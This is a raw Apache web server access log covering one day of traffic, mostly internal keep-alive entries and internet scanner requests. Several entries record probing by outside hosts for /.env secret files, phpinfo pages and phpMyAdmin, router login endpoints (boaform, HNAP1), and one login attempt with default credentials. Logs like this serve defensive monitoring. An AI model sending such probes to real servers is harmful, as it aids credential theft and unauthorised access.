43.154.128.189 - - [27/Mar/2023:02:50:54 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
94.102.61.10 - - [27/Mar/2023:02:59:50 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "python-requests/2.26.0"
94.102.61.10 - - [27/Mar/2023:02:59:50 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "python-requests/2.26.0"
94.102.61.10 - - [27/Mar/2023:02:59:50 +0000] "GET / HTTP/1.1" 200 8383 "-" "python-requests/2.26.0"
::1 - - [27/Mar/2023:03:11:17 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:35 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:36 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:37 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:44 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:45 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:46 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:47 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:48 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:49 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:50 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:51 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:52 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:53 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:54 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:55 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:56 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:57 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:58 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:11:59 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:00 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:01 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:02 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:03 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:04 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:05 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:06 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:07 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:08 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:09 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:10 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:11 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:12 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:13 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:14 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:15 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:16 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:17 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:26 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:27 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:28 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:29 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:33 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:34 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:35 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:36 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:03:12:37 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
135.125.246.189 - - [27/Mar/2023:03:57:59 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [27/Mar/2023:03:57:59 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [27/Mar/2023:04:08:43 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
198.235.24.130 - - [27/Mar/2023:04:31:26 +0000] "\x16\x03\x01" 400 226 "-" "-"
::1 - - [27/Mar/2023:04:46:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:26 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:27 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:28 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:29 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:33 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:34 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:35 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:36 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:37 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:44 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:45 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:46 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:47 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:48 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:49 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:50 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:51 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [27/Mar/2023:04:46:52 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
198.44.136.60 - - [27/Mar/2023:04:51:01 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.44.136.60 - - [27/Mar/2023:04:51:02 +0000] "GET /phpinfo.php HTTP/1.1" 200 24275 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.79.181.251 - - [27/Mar/2023:04:58:52 +0000] "\x16\x03\x01" 400 226 "-" "-"
135.125.246.189 - - [27/Mar/2023:05:18:50 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [27/Mar/2023:05:18:50 +0000] "POST / HTTP/1.1" 405 409744 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [27/Mar/2023:05:26:35 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
212.19.21.158 - - [27/Mar/2023:05:41:35 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
135.125.246.110 - - [27/Mar/2023:06:27:11 +0000] "POST / HTTP/1.1" 405 409718 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.216.216.40 - - [27/Mar/2023:06:37:44 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0"
43.154.128.189 - - [27/Mar/2023:06:44:51 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.189 - - [27/Mar/2023:07:07:53 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.246.189 - - [27/Mar/2023:07:07:54 +0000] "POST / HTTP/1.1" 405 409706 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
94.102.61.10 - - [27/Mar/2023:07:30:07 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
162.243.130.23 - - [27/Mar/2023:07:48:17 +0000] "GET / HTTP/1.1" 200 8379 "-" "Mozilla/5.0 zgrab/0.x"
185.225.74.201 - - [27/Mar/2023:07:49:14 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423600 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
43.154.128.189 - - [27/Mar/2023:08:03:12 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
157.230.113.5 - - [27/Mar/2023:08:05:25 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
157.230.113.5 - - [27/Mar/2023:08:05:25 +0000] "POST / HTTP/1.1" 405 409736 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
157.230.113.5 - - [27/Mar/2023:08:05:26 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 240 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1"
185.209.160.120 - - [27/Mar/2023:08:09:54 +0000] "POST /boaform/admin/formLogin HTTP/1.1" 405 423623 "http://13.244.159.169:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
117.216.23.124 - - [27/Mar/2023:08:19:00 +0000] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 200 - "-" "-"
45.79.181.179 - - [27/Mar/2023:08:59:29 +0000] "\x16\x03\x01" 400 226 "-" "-"
162.142.125.224 - - [27/Mar/2023:09:04:06 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
162.142.125.224 - - [27/Mar/2023:09:04:07 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.224 - - [27/Mar/2023:09:04:07 +0000] "PRI * HTTP/2.0" 400 226 "-" "-"
162.142.125.224 - - [27/Mar/2023:09:04:08 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.224 - - [27/Mar/2023:09:04:08 +0000] "GET /assets/img/apple-touch-icon.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.224 - - [27/Mar/2023:09:04:09 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
135.125.246.110 - - [27/Mar/2023:09:07:51 +0000] "POST / HTTP/1.1" 405 409686 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.81.243.34 - - [27/Mar/2023:09:13:27 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
45.81.243.34 - - [27/Mar/2023:09:13:28 +0000] "POST /HNAP1/ HTTP/1.1" 301 235 "-" "Mozila/5.0"
43.154.128.189 - - [27/Mar/2023:09:21:29 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.110 - - [27/Mar/2023:09:35:02 +0000] "POST / HTTP/1.1" 405 409726 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [27/Mar/2023:10:16:23 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
128.199.77.96 - - [27/Mar/2023:10:39:27 +0000] "GET / HTTP/1.0" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0"
43.154.128.189 - - [27/Mar/2023:10:39:47 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
18.134.227.94 - - [27/Mar/2023:10:42:20 +0000] "GET / HTTP/1.0" 200 41463 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
167.99.13.19 - - [27/Mar/2023:10:46:17 +0000] "GET /aaa9 HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
167.99.13.19 - - [27/Mar/2023:10:46:18 +0000] "GET /aab8 HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
167.99.13.19 - - [27/Mar/2023:10:46:18 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 zgrab/0.x"
18.134.227.94 - - [27/Mar/2023:10:46:27 +0000] "GET / HTTP/1.0" 200 41463 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.134.227.94 - - [27/Mar/2023:10:50:33 +0000] "GET / HTTP/1.0" 200 41463 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
172.104.11.46 - - [27/Mar/2023:10:53:07 +0000] "\x16\x03\x01" 400 226 "-" "-"
143.198.45.169 - - [27/Mar/2023:11:21:32 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 6.1; rv:55.0.2) Gecko/20100101 Firefox/55.0.2"
18.134.227.94 - - [27/Mar/2023:11:21:40 +0000] "GET /favicon.ico HTTP/1.1" 200 3098 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
109.206.243.235 - - [27/Mar/2023:11:32:16 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
